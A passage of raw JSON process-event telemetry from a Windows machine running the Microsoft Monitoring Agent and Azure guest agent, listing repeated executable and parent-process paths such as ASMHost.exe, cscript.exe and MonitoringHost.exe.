Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-1\\n4_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\n(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\n(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\ICT\\n2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\"],\"ParentProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-1\\n4_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-1\\n4_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-1\\n4_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft 